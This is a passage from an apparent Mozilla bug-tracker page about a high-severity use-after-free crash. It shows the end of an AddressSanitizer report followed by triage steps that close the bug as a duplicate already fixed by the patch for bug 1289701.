  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==19899==ABORTING
Group: core-security → dom-core-security
Flags: needinfo?(bbirtles)
Keywords: crash, csectype-uaf, sec-high, testcase
Redirecting to Hiro since he's been looking into this class of bugs recently (nested calls to GetContext) and has a patch for this in bug 1289701 (of which this is likely a dupe).
Flags: needinfo?(bbirtles) → needinfo?(hiikezoe)
That's right. Hidden documentElement and font style animation.
I just confirmed the patch for bug 1289701 fixed this.
Status: NEW → RESOLVED
Closed: 8 years ago
Flags: needinfo?(hiikezoe)
Resolution: --- → DUPLICATE
Flags: sec-bounty?
Flags: sec-bounty? → sec-bounty-
Group: dom-core-security
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: